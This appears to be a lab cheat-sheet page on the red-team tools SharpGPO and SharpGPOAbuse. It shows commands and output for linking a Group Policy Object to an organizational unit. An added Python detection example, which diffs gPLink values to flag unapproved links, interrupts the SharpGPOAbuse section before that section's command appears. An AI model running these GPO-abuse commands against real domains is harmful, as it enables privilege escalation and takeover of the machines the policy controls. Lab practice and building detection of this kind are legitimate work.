SharpGPO/SharpGPOAbuse
SharpGPO and SharpGPOAbuse are both powerful tools when dealing with GPO vulnerabilities.
SharpGPO
SharpGPO is a Red Team tool written in C# that can be used to remotely manipulate Group Policy Objects (GPOs), Organizational Units (OUs), GPLinks and Security Filtering.
In the following example, a GPO named 'Corp' is linked to another OU:
SharpGpo.exe --Action GetGPLink --GPOName Corp
SharpGpo.exe --Action NewGPLink --DN "OU=Member Servers,DC=rastalabs,DC=local" --GPOName Corp
[*] Domain: rastalabs.local
[*] Domain Contorller: dc01.rastalabs.local
[*] Domain Distingushed Name: DC=rastalabs,DC=local
[*] GUID of the GPO 'Corp': {D693F1E4-5666-4259-8BF1-E43CCE1D56F9}
[*] Creating a gPLink: OU=Member Servers,DC=rastalabs,DC=local => GPO {D693F1E4-5666-4259-8BF1-E43CCE1D56F9}
[*] gPLink: [LDAP://cn={FC395C1F-E3BD-43B9-8F58-6DA55E69D3E9},cn=policies,cn=system,DC=rastalabs,DC=local;0][LDAP://cn={58F87FD9-442F-4514-99D3-45BDE620F642},cn=policies,cn=system,DC=rastalabs,DC=local;0]
[*] gPLink was successfully created
[*] gPLink after created: [LDAP://CN={D693F1E4-5666-4259-8BF1-E43CCE1D56F9},CN=Policies,CN=System,DC=rastalabs,DC=local;0][LDAP://cn={FC395C1F-E3BD-43B9-8F58-6DA55E69D3E9},cn=policies,cn=system,DC=rastalabs,DC=local;0][LDAP://cn={58F87FD9-442F-4514-99D3-45BDE620F642},cn=policies,cn=system,DC=rastalabs,DC=local;0]
SharpGPOAbuse
SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.
In the following example a user is added to the local admin group for OUs using the GPO:
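Detection note on the SharpGPO output earlier on this page: the gPLink value of a container before and after a change is what a monitoring job compares to spot a newly linked GPO. The Python below is an added example, not code from the original page or from either tool. The function names and the baseline set are assumptions, and the two gPLink strings are copied from the output above.

```python
import re

# One gPLink entry: [LDAP://cn={GPO GUID},cn=policies,cn=system,<domain DN>;<options>]
LINK_RE = re.compile(
    r"\[LDAP://cn=\{(?P<guid>[0-9a-f-]{36})\},cn=policies,cn=system,"
    r"[^;\]]+;(?P<opts>\d+)\]",
    re.IGNORECASE,  # the output above shows both "cn=" and "CN=" spellings
)

def parse_gplink(value):
    """Map each linked GPO GUID (upper case) to its integer link options."""
    return {m["guid"].upper(): int(m["opts"]) for m in LINK_RE.finditer(value or "")}

def describe(opts):
    """Link options are bit flags: bit 0 = link disabled, bit 1 = enforced."""
    return ("disabled" if opts & 1 else "enabled") + (", enforced" if opts & 2 else "")

def diff_gplink(before, after, baseline=frozenset()):
    """Compare two gPLink values of one container; flag links outside the baseline."""
    old, new = parse_gplink(before), parse_gplink(after)
    added = sorted(set(new) - set(old))
    return {
        "added": added,
        "removed": sorted(set(old) - set(new)),
        "options_changed": sorted(g for g in old.keys() & new.keys() if old[g] != new[g]),
        "unapproved": [g for g in added if g not in baseline],
    }

# gPLink of "OU=Member Servers,DC=rastalabs,DC=local", copied from the output above.
BEFORE = (
    "[LDAP://cn={FC395C1F-E3BD-43B9-8F58-6DA55E69D3E9},cn=policies,cn=system,DC=rastalabs,DC=local;0]"
    "[LDAP://cn={58F87FD9-442F-4514-99D3-45BDE620F642},cn=policies,cn=system,DC=rastalabs,DC=local;0]"
)
AFTER = (
    "[LDAP://CN={D693F1E4-5666-4259-8BF1-E43CCE1D56F9},CN=Policies,CN=System,DC=rastalabs,DC=local;0]"
    + BEFORE
)
# Assumption: the links present before the change are the approved baseline for this OU.
BASELINE = frozenset(parse_gplink(BEFORE))

if __name__ == "__main__":
    result = diff_gplink(BEFORE, AFTER, BASELINE)
    for guid in result["unapproved"]:
        opts = parse_gplink(AFTER)[guid]
        print(f"ALERT: GPO {{{guid}}} newly linked ({describe(opts)}), not in baseline")
```

The two input strings can come from periodic LDAP snapshots of the container or from the old and new values recorded by directory-change auditing.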